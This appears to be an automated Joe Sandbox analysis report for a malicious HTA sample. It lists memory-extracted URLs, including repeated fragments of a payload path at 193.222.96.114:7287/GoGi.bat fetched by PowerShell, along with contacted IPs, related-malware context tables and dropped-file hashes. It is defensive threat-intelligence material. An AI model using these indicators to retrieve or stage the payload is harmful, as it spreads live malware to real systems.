        http://crl.ver)svchost.exe, 0000000B.00000002.2966470735.000002AB2DCC0000.00000004.00000020.00020000.00000000.sdmpfalse
          		low
          https://g.live.com/odclientsettings/ProdV2.C:edb.log.11.dr, qmgr.db.11.drfalse
            		high
            http://193.222.96.114:72powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              http://193.222.96.powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalselow
              https://aka.ms/pscore6LRpowershell.exe, 0000000A.00000002.1786540892.0000000004C87000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://193.222.96.114powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://193.222.96.114:728powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://193.222.96.114:7287/GoGi.bapowershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://g.live.com/odclientsettings/Prod.C:edb.log.11.dr, qmgr.db.11.drfalse
                        		high
                        http://193.222.9powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalselow
                        http://193.22powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalselow
                        http://193.222.96.114:7287/Gopowershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://g.live.com/odclientsettings/ProdV2edb.log.11.dr, qmgr.db.11.drfalse
                            		high
                            http://193.222.96.114:7287/Gpowershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://193.222.96.114:7287/GoGipowershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://193.222.96powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalselow
                                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drfalse
                                  		high
                                  http://193.222.96.1powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  http://193.222.96.114:7287powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://193.222.96.114:powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://193.222.96.114:7287/GoGi.bpowershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://193.2powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalselow
                                            http://193.222powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalselow
                                            http://193.222.96.114:7287/powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://193.222.96.114:7powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://193.222.96.11powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                  https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drfalse
                                                    		high
                                                    http://193.222.96.114:7287/GoGpowershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      13.107.246.41
                                                      		part-0013.t-0009.t-msedge.netUnited States
                                                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      193.222.96.114
                                                      		unknownGermany
                                                      		3303SWISSCOMSwisscomSwitzerlandLtdCHfalse

                                                      Private

                                                      IP
                                                      127.0.0.1

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1429074
                                                      Start date and time:2024-04-20 16:04:06 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 5m 54s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:18
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:hta.hta
                                                      Detection:MAL
                                                      Classification:mal100.troj.winHTA@22/17@0/3
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 34
                                                      • Number of non-executed functions: 3
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .hta

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 52.109.8.89, 52.113.194.132, 23.44.104.130, 52.109.8.36, 199.232.214.172, 20.189.173.6
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, cus-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, wu-bg-shim.trafficmanager.net, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, s-0005.s-msedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net,
                                                      • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7828 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      16:05:03API Interceptor26x Sleep call for process: powershell.exe modified
                                                      16:05:07API Interceptor2x Sleep call for process: svchost.exe modified
                                                      16:06:10API Interceptor630x Sleep call for process: splwow64.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      13.107.246.41http://www.surveymonkey.com/tr/v1/te/PUEIZHbYTJGrZEIkVMWlCoicdktJQxDgUh5D5mhe1V5RrTmuIdynx7PnFHXRUx9slMgQjvZdyUWqhr_2Bl49oNXjy3TOleTjKMKR6WbsGcrstlT2syBMlSkW7U5aKlKcBD9NFqJqrxGyODSWJJr6_2BMbXsKkDA_2F0ep4iw23xw6huuM_3DGet hashmaliciousUnknownBrowse
                                                      • www.eand.com/en/index.html
                                                      02-11-2024 MVP.htmlGet hashmaliciousUnknownBrowse
                                                      • www.mvphealthcare.com/
                                                      02-11-2024 MVP.htmlGet hashmaliciousUnknownBrowse
                                                      • www.mvphealthcare.com/
                                                      http://y84x.mjt.lu/lnk/CAAABPdweCoAAAAAAAAAAAVG8MwAAAA6pnMAAAAAAAvpOQBlhIO4-ImJ1UImRBC5CNVIkLSaswAL-7Q/2/r-vXj7XjX0azsD7QNKNH-A/aHR0cHM6Ly9hcHBjZW50ZXIubXMvaW52aXRhdGlvbnMvb3JnL2IxNjM2ZDYzMTE0YTM0MjBkYWFmNTg4YTE5N2Y0N2MxNGY4ZDViNWMyM2ZjM2RhYTgxMWM0ODgwOWM1ZTZkNjQGet hashmaliciousUnknownBrowse
                                                      • appcenter.ms/
                                                      http://url7816.acetaxi.com/ls/click?upn=k9eqZnPBEZmPVPka3LxS61O1ksdCJOgznvtiwccqzi2-2BneqvfCXEJ-2FQj-2BZo7snmCwDunBahf2LYhfs7qQp7-2F23xLStq-2BkxJ70xqVvyXzkWM-3D8Cie_z5TGfmB4A65PPE2hDgRdrx6OZsZ3AmrJLHJ0M9ePWeHP5QDTWsAVp117uXam9dNn-2BGSxHeP-2BInRF-2Bgy2v-2FXBPODjmLss6NRV2RYsUYD7um77hgLl0ET9pPGTHF-2BQ1m6-2Fw7-2B-2B9DJOpakZj874YLC8uUep0F7rZMDlM46gmHmQqqAeCV477M0h2b07T2IcXu0hzUcKftN0UG2jhPq8qo00cQl0gvOLl-2BjChyaOdLpENao-3DGet hashmaliciousUnknownBrowse
                                                      • twiliosolutions.azurefd.net/
                                                      193.222.96.114GoGi.batGet hashmaliciousUnknownBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        bg.microsoft.map.fastly.netGoGi.batGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        fP4kybhBWi.exeGet hashmaliciousQuasarBrowse
                                                        • 199.232.214.172
                                                        ShippingOrder_ GSHS2400052.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                        • 199.232.210.172
                                                        https://bj8lt4fm8evwyl.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        https://28.104-168-101-28.cprapid.com/Pay-PaI/Get hashmaliciousPayPal PhisherBrowse
                                                        • 199.232.214.172
                                                        https://sharma-sanjana2108.github.io/Microsoft/Get hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        https://pusha1qsn.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                        • 199.232.214.172
                                                        https://support1-4ec.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                        • 199.232.210.172
                                                        https://support-bxv.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                        • 199.232.214.172
                                                        https://k19gdtyrshgcjghldjk.z13.web.core.windows.net/Win/index.html?phone=nullGet hashmaliciousTechSupportScamBrowse
                                                        • 199.232.210.172
                                                        part-0013.t-0009.t-msedge.nethttps://sharma-sanjana2108.github.io/Microsoft/Get hashmaliciousUnknownBrowse
                                                        • 13.107.246.41
                                                        https://19apmic17.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                        • 13.107.246.41
                                                        https://19apmic11.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                        • 13.107.213.41
                                                        https://estgirls-my.sharepoint.com/:b:/g/personal/s7958766_estg_moe_gov_sa/EeCN0MAR0F5NufUZkT2Q-mcBn4v13Ov8FQ0oi798Dgtayg?e=zTKNmKGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.246.41
                                                        FFE Order details - Cincy v41720.xlsxGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.41
                                                        https://keenetownhall-my.sharepoint.com/:b:/g/personal/amanda_keenetownhall_org/ESKbqbSIMj5ElsbdsfaEg7oBgkFm5H_JqS97uaySzVhJDQ?e=KMMz4yGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.246.41
                                                        https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 13.107.246.41
                                                        Encrypted_PaymentAdvice_Reference.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.246.41
                                                        https://url.us.m.mimecastprotect.com/s/kCCtC5yEz0tWp5ANrfz_KPV?domain=paplastics365-my.sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.246.41
                                                        https://edbullardcompany-my.sharepoint.com/:f:/g/personal/eric_rosario_bullard_com/EoLKvcaqSE1Go3fA5to5CQABtxAftKTD0ktrakp7rbi4Xg?e=Mvbf0DGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.246.41

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        SWISSCOMSwisscomSwitzerlandLtdCHhta.htaGet hashmaliciousUnknownBrowse
                                                        • 193.222.96.128
                                                        GoGi.batGet hashmaliciousUnknownBrowse
                                                        • 193.222.96.114
                                                        15.batGet hashmaliciousUnknownBrowse
                                                        • 193.222.96.128
                                                        ShippingOrder_ GSHS2400052.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                        • 193.222.96.147
                                                        Encrypted_PaymentAdvice_Reference.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 193.222.96.119
                                                        z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 193.222.96.21
                                                        z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 193.222.96.21
                                                        UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 193.222.96.21
                                                        wFtZih4nN9.elfGet hashmaliciousMiraiBrowse
                                                        • 85.7.65.219
                                                        dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 193.222.96.11
                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSjNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                        • 20.189.173.21
                                                        74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                        • 13.89.179.12
                                                        https://sharma-sanjana2108.github.io/Microsoft/Get hashmaliciousUnknownBrowse
                                                        • 13.107.213.41
                                                        https://19apmic17.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                        • 13.107.246.51
                                                        https://19apmic11.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                        • 13.107.213.41
                                                        https://phrmacompliance-my.sharepoint.com/:b:/g/personal/jjessen_pharma-compliance_net/EQZ_BD-NnrNInOz6x58pqAABLCZuVkxMtPHJVQGDMcKQDA?e=as678XGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 13.107.136.10
                                                        https://estgirls-my.sharepoint.com/:b:/g/personal/s7958766_estg_moe_gov_sa/EeCN0MAR0F5NufUZkT2Q-mcBn4v13Ov8FQ0oi798Dgtayg?e=zTKNmKGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.246.70
                                                        https://estgirls-my.sharepoint.com/:b:/g/personal/s7958766_estg_moe_gov_sa/EeCN0MAR0F5NufUZkT2Q-mcBn4v13Ov8FQ0oi798Dgtayg?e=zTKNmKGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.213.41
                                                        FFE Order details - Cincy v41720.xlsxGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.69
                                                        FFE Order details - Cincy v41720.xlsxGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.40

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        a0e9f5d64349fb13191bc781f81f42e12M1NS61GG8.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                        • 13.107.246.41
                                                        RrHuyQ4GzG.exeGet hashmaliciousLummaCBrowse
                                                        • 13.107.246.41
                                                        SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.41
                                                        SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.41
                                                        FFE Order details - Cincy v41720.xlsxGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.41
                                                        z47Danfe-Pedido17042024.msiGet hashmaliciousMicroClipBrowse
                                                        • 13.107.246.41
                                                        SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        • 13.107.246.41
                                                        Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.41
                                                        s2dwlCsA95.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 13.107.246.41
                                                        SecuriteInfo.com.Trojan.PWS.Steam.37210.2413.24955.exeGet hashmaliciousLummaCBrowse
                                                        • 13.107.246.41

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):1.3073489056561383
                                                        Encrypted:false
                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrg:KooCEYhgYEL0In
                                                        MD5:233F5B68FD7D09F8D87F9EEC01D525E7
                                                        SHA1:D70DF9E820EFED7923B02777B81D73D6BCCD8A05
                                                        SHA-256:865B036F9A4D37C2AA6D7F48C4870C0426B05CDA362B5527CF99C1AE86BAFF28
                                                        SHA-512:9C529506D7A8C2C52B54C6E90A74BA98DEA0B5B915C1DC1DE051BD2862BBFDE711615D4BD579AE4AF633E15B10D32CA3F7B60D7D91E4DC7D1F32ADE133410EA2
                                                        Malicious:false
                                                        Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x689d4e29, page size 16384, DirtyShutdown, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.4221069424258232
                                                        Encrypted:false
                                                        SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                        MD5:ABD599269C5CD0CFB8D98E181EFB504E
                                                        SHA1:9EA8D4A7AE4234FE3579FA3D85FBC13AE57383C0
                                                        SHA-256:3AA16BBD0BCB2DAB2F9A478DA4B80DF8454EBC99780A6D78AEE966F8F61948C2
                                                        SHA-512:DC2F056020F6896BFFFAD62832AFD179F2ED9335F4A825558E1138202A9B5BAFABB55528CAC0317D68136B753D594AA4F3CCFCD9B2A70114C0584DCBFEC86C3C
                                                        Malicious:false
                                                        Preview:h.N)... .......A.......X\...;...{......................0.!..........{A......|u.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................D{......|.....................2.....|u..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):0.07579482337093124
                                                        Encrypted:false
                                                        SSDEEP:3:7YeaGRuajn13a/Qrxh6/AllcVO/lnlZMxZNQl:7zOa53qQrn6/AOewk
                                                        MD5:E8207ABFEC3CE8068C508051179E3006
                                                        SHA1:5F8FD85935176260A344F4C0212A75B2EA306577
                                                        SHA-256:4063F3B60449BF91346976775B70BAD334B66DA8E479C750C5D3A9831223F6A1
                                                        SHA-512:CABF2572189B98FEFB6AAB58C1D15CB7B23FFE342A54EEEBA885C53E0014C458557ED20423A8D905000FA61F6FC9EFE419748FC54DA405692575D52651AC88E3
                                                        Malicious:false
                                                        Preview:.YR0.....................................;...{.......|u......{A..............{A......{A..........{A]...................2.....|u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):338
                                                        Entropy (8bit):3.459997039905481
                                                        Encrypted:false
                                                        SSDEEP:6:kKg2/r8m2al0iJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:oYrNlkkPlE99SCQl2DUevat
                                                        MD5:E4D211EAEC94715169C453F3C7528D3E
                                                        SHA1:9BCF8F3407F29C773D6ECC955B5975AA085C9FE1
                                                        SHA-256:6667DE9EF61DA9E23B285F75503622357C8770E87B96F94E50DC9B8FEACDF42E
                                                        SHA-512:0BB1AB90029C056EAE63CD33938F883887EEB3A828FF9B657519CCA91DF7956C27D0B9B08FEB3E5D2C09F0277A4F4F274FB106A6F6D7FC72DAA57A0C30A42754
                                                        Malicious:false
                                                        Preview:p...... ..........W.+...(...............................................C/.@... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1368
                                                        Entropy (8bit):5.414770380179797
                                                        Encrypted:false
                                                        SSDEEP:24:3qWSKco4KmZjKMs4RPTkmAmoUebIKo+mZ9tXt/NK3R88bJ0G9r9:6WSU4xc4R4mloUeW+mZ9tlNWR83+R
                                                        MD5:85509342E1C292F7D2E0AC39102FE3E8
                                                        SHA1:F16147BCFB535421F31A57A0E8D39F844BAFA332
                                                        SHA-256:71C1831583DDA80B71BDD06338DF1DC0EF7A1C1172934CDC703EC68F4BE6D70E
                                                        SHA-512:C866AC38FF059982DDA993B7210D5ADA08F5454D52B1F8D76D592ED7FC61C72D457D0A09BA73C6D6D29716B0C3D4F8113F021307132E4BBE9F6BBFDA4F94D244
                                                        Malicious:false
                                                        Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05blmdqe.4yh.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ql2421xb.nmu.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vp24bue4.0ff.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
